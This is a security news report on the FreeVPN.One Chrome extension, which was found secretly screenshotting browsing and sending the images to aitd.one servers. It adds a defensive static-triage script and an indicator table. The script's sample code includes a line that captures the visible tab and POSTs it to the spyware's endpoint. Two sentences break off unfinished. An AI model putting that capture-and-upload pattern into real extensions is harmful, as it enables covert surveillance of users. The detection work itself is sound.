A Chrome extension marketed as FreeVPN.One, boasting over 100,000 installations, a verified badge, and featured placement in the Chrome Web Store, has been exposed as spyware that silently captures screenshots of users’ browsing activities and exfiltrates them to remote servers.
Despite its privacy policy explicitly stating that the developer does not collect or use user data, forensic analysis reveals a stark contradiction: the extension engages in persistent surveillance, capturing sensitive information such as banking details, personal messages, and private documents without user consent or notification.
Sophisticated Exfiltration Techniques
The extension’s malicious behavior leverages a two-stage architecture for screenshot capture.
Upon installation, a content script is injected into every HTTP and HTTPS page via broad manifest matches, triggering an automatic 1.1-second delayed capture after page load to ensure full rendering of sensitive content.
This script communicates with the background service worker, which invokes the chrome.tabs.captureVisibleTab() API to generate screenshots, bundling them with the page URL, tab ID, and a unique user identifier before transmitting them to aitd[.]one/brange.php.
Additionally, the “Scan with AI Threat Detection” feature, presented as an on-demand local analysis, captures full-page screenshots and uploads them to aitd[.]one/analyze.php, though this is merely a facade for the ongoing background surveillance.
On startup, the extension queries IP geolocation APIs, collects device metadata, and sends base64-encoded analytics to aitd[.]one/bainit.php.
The latest version (v3.1.4) implements AES-256-GCM encryption with RSA key wrapping, obfuscating data in transit and complicating network-based detection.
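The combination described above (content scripts matched against every http/https page, captureVisibleTab called from the background script, and uploads to a remote host) is something a defender can check for statically in an unpacked extension. The following triage script is an added example, not code from the report or from Koi Security; the manifest and source snippets it scans are constructed to mirror the described layout, and the known-bad host list is taken from the report's IoC table.

```python
import json
import re
from urllib.parse import urlparse

# IoC hosts from the report's table; any other host seen in a URL counts as "remote".
KNOWN_BAD_HOSTS = {"aitd.one", "scan.aitd.one", "extrahefty.com", "freevpn.one"}
# Content-script match patterns that inject into every http/https page.
BROAD_MATCHES = {"<all_urls>", "http://*/*", "https://*/*", "*://*/*"}
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'`]*)?")

def triage_extension(manifest, sources):
    """Static heuristics for the reported pattern: broad content-script injection,
    captureVisibleTab in the background script, and uploads to remote hosts.
    Returns the individual signals plus a coarse risk label."""
    broad = any(BROAD_MATCHES & set(cs.get("matches", []))
                for cs in manifest.get("content_scripts", []))
    blob = "\n".join(sources.values())
    screenshot_api = "captureVisibleTab" in blob
    hosts = {h for h in (urlparse(u).hostname for u in URL_RE.findall(blob)) if h}
    bad = hosts & KNOWN_BAD_HOSTS
    signals = sum([broad, screenshot_api, bool(hosts)])
    if bad or signals == 3:
        risk = "high"
    elif signals == 2:
        risk = "medium"
    else:
        risk = "low"
    return {"broad_content_scripts": broad, "screenshot_api": screenshot_api,
            "remote_hosts": sorted(hosts), "known_bad_hosts": sorted(bad), "risk": risk}

# Constructed sample mirroring the described layout; not the extension's real files.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "permissions": ["tabs", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["http://*/*", "https://*/*"], "js": ["content.js"]}],
    "background": {"service_worker": "sw.js"},
}
SAMPLE_SOURCES = {
    # 1.1-second delayed trigger after page load, as the report describes
    "content.js": "addEventListener('load', () => setTimeout(() => "
                  "chrome.runtime.sendMessage({t: 'cap'}), 1100));",
    "sw.js": "chrome.runtime.onMessage.addListener((m, s) => chrome.tabs.captureVisibleTab("
             "null, {format: 'png'}, img => fetch('https://aitd.one/brange.php', "
             "{method: 'POST', body: JSON.stringify({img, url: s.url, tab: s.tab.id})})));",
}

if __name__ == "__main__":
    print(json.dumps(triage_extension(SAMPLE_MANIFEST, SAMPLE_SOURCES), indent=2))
```

Run it against the unpacked files of an installed extension (manifest.json plus the scripts it lists) to flag candidates for manual review; a "high" result is a reason to inspect the network traffic, not a verdict on its own.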
The extension demands excessive permissions, including
These permissions enable the exfiltration of highly sensitive data, such as passwords and personal photos, directly opposing the privacy expectations of a VPN tool.
What began as a legitimate proxy-based VPN in earlier versions evolved through incremental updates: v3.0.3 introduced
The subsequent v3.1.4 further masked operations by shifting to scan.aitd.one and enhancing encryption.
Developer Claims Fall Short
Contact with the developer elicited defenses, including assertions that automatic captures target only suspicious domains as part of “Background Scanning,” with plans for opt-in consent in future updates.
However, testing confirmed captures on benign sites like Google Sheets and Photos. Claims of transient analysis without storage remain unverifiable, as data is exfiltrated to uncontrolled servers.

According to the report, the developer's affiliation points to phoenixsoftsol.com, a rudimentary Wix site lacking credible company details, and responses ceased when pressed for verifiable profiles.
This incident underscores vulnerabilities in Chrome’s extension review process, where automated scans and human oversight failed to detect the shift from benign VPN functionality to spyware, despite the extension’s five-year history of purported data integrity.
Authored by Koi Security researchers, this exposure highlights the risks of untrusted third-party extensions in browser ecosystems.
Enterprises relying on such tools face escalating threats, prompting calls for enhanced governance platforms to monitor and mitigate risks across marketplaces.
Indicators of Compromise (IoCs)
| Indicator Type | Value |
|---|---|
| Extension ID | jcbiifklmgnkppebelchllpdbnibihel |
| Domain | aitd.one |
| Domain | extrahefty.com |
| Domain | freevpn.one |
| Domain | scan.aitd.one |